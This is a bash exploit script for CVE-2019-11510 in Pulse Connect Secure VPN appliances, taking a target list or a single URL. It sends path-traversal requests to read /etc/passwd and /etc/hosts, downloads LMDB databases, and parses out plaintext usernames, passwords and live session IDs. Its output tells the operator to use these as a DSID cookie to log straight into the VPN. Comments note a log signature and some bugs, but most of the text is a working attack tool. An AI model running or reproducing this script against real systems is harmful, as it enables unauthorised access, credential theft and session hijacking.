#!/bin/bash
# Usage : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/
# To only verify the vulnerability and download /etc/passwd, use : cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd / bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd
# You must have binutils installed (it provides `strings`); install it with: apt-get install binutils
# Release Date : 21/08/2019
# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
# Banner only; the quoted block is printed verbatim and has no effect on the run.
echo "=================================================================================
___ _ _ ____ ___ _ _
| _ \ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _
| _/| '_|/ _ \ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \ | | | ' \ / _' || |/ _' |
|_| |_| \___/_/ |\___|\__| \__| /___|\___||_| \___/ |___||_||_|\__,_||_|\__,_|
|__/ CVE-2019-11510
================================================================================="
##############################
# Create the results directory relative to the current working directory.
# checkexp writes everything it retrieves below it, including files that hold
# plaintext credentials and session identifiers, so the location is sensitive.
if [ ! -d "output" ]; then
mkdir "output";
fi
##############################
# Minimal option parsing.
#   -d URL              probe a single URL (stored in DOM); otherwise targets
#                       are read from stdin at the bottom of the script.
#   --only-etc-passwd   set VER, which makes checkexp stop after /etc/passwd.
# Any other argument ends parsing silently (the `*)` arm breaks the loop).
# NOTE: the `--only-etc-passwd` arm shifts twice although the flag takes no
# value, so the argument that follows it is discarded: `--only-etc-passwd -d URL`
# loses `-d` and falls back to reading stdin. Give the flag last, or drop the
# second shift.
while test $# -gt 0; do
case "$1" in
-d)
# consume the flag, then its value
shift
DOM=$1
shift
;;
--only-etc-passwd)
shift
VER="yes"
# this second shift eats the next argument (see note above)
shift
;;
*)
break
;;
esac
done
##############################
# checkexp URL
#   Probe one host for CVE-2019-11510 (pre-auth arbitrary file read in Pulse
#   Connect Secure) and, when the probe succeeds, retrieve the files listed
#   below into output/<host>/.
# Arguments: $1 - base URL; one trailing "/" is stripped
# Globals:   VER (read) - when non-empty, stop after /etc/passwd
# Outputs:   status lines on stdout; retrieved files under output/<host>/
# Detection note: every request below carries the same traversal sequence,
#   "/dana-na/../dana/html5acc/guacamole/../../../../../../../" followed by a
#   "?/dana/html5acc/guacamole/" query string. That substring in proxy, WAF or
#   appliance access logs is the signature of this tool and of the CVE itself.
# Operator risk: `-k` disables TLS certificate verification, there is no
#   set -e/-u, and a failed curl simply yields an empty file that is processed
#   anyway. Several values that originate from the remote response or from the
#   target list are expanded unquoted (see inline notes), so the script trusts
#   its own input as much as the target trusts the request.
function checkexp {
UR=$1
# drop one trailing slash so the traversal path concatenates cleanly
URL=${UR%/}
# Probe request. The body is written to a fixed-name file in the cwd, so two
# concurrent runs overwrite each other's c.txt; mktemp would avoid that.
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" > c.txt
RE=$(cat c.txt)
# "Vulnerable" is decided solely on the body containing the root passwd entry.
if [[ $RE == *"root:x:0:0:root"* ]]; then
echo "$URL ---------------> Vulnerable"
# Host part of the URL (scheme and anything after the first "/" removed). It
# is used unquoted in most paths below and is not validated, so a target-list
# entry whose host part contains whitespace or glob characters breaks them.
URLDOM=$(echo $URL | sed -e 's|^[^/]*//||' -e 's|/.*$||')
if [ ! -d "output/$URLDOM" ]; then
mkdir "output/$URLDOM";
fi
echo "Writing all files to output/$URLDOM/"
echo Extracting /etc/passwd
# the probe response is kept as the first artifact
mv c.txt output/$URLDOM/etc_passwd
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cat output/$URLDOM/etc_passwd
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# VER is set by --only-etc-passwd: everything past this point is skipped.
if [ -z "$VER" ]; then
echo Extracting /etc/hosts
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" > output/$URLDOM/etc_hosts
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cat output/$URLDOM/etc_hosts
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb
echo Extracting Usernames and Passwords from /data/runtime/mtmp/lmdb/dataa/data.mdb
# strings (binutils) flattens the LMDB file; sed -z (GNU sed only) then joins
# all lines with the marker token "pzipzipzi" so a user and the value that
# follows it can be matched on a single line.
cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb | strings > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings
cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | sed -z 's/\n/pzipzipzi/g' > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
# candidate usernames: the value of the first "cn=" attribute on each line
cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | grep "cn=" | cut -d ',' -f1 | cut -d '=' -f2 > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# For each username, look for "<user>pzipzipzipassword@2pzipzipzi" in the
# joined text and take what follows, up to the next marker, as the password.
# NOTE: $ST and $LI are expanded unquoted and unescaped, and $line comes from
# the downloaded data, i.e. from the remote host. Remote content therefore
# becomes part of a grep pattern and of a sed expression evaluated on the
# operator's machine. Quote them ("$ST", "$LI") and escape regex
# metacharacters, or this tool is itself exposed to crafted responses.
while read -r line; do
ST=$line"pzipzipzipassword@2pzipzipzi"
if grep -q $ST "output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod"; then
LI="s/.*"$line"pzipzipzipassword@2pzipzipzi//;s/pzipzipzi.*//"
PASW=$(cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod | sed -e $LI)
echo "User : $line | Password : $PASW"
# plaintext credentials are persisted to disk here (sensitive artifact)
echo "User : $line | Password : $PASW" >> output/$URLDOM/plaintext_user_pass.txt
else
echo "User : $line | Password not found."
fi
done < output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# only the joined working copy is removed; the raw .mdb and .strings stay
rm output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
echo "Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn"
curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb
# lines containing "randomVal" are trimmed to the identifier from byte 10 on
# and de-duplicated; the result is a list of live session tokens, which is
# as sensitive as the password file above.
cat output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb | strings | grep randomVal | cut -b 10- | sort -u > output/$URLDOM/sessionids.txt
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cat output/$URLDOM/sessionids.txt
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fi
else
# not vulnerable: discard the probe response
rm c.txt
echo "$URL ---------------> Not Vulnerable"
fi
}
##############################
# Entry point. With -d, probe that single URL; otherwise read one target per
# line from stdin. `read` without -r and the unquoted $x mean lines containing
# backslashes, whitespace or glob characters are altered before checkexp sees
# them; `while IFS= read -r x; do checkexp "$x"; done` would pass them intact.
if [ -z "$DOM" ]; then
while read x
do
checkexp $x
done
else
checkexp $DOM
fi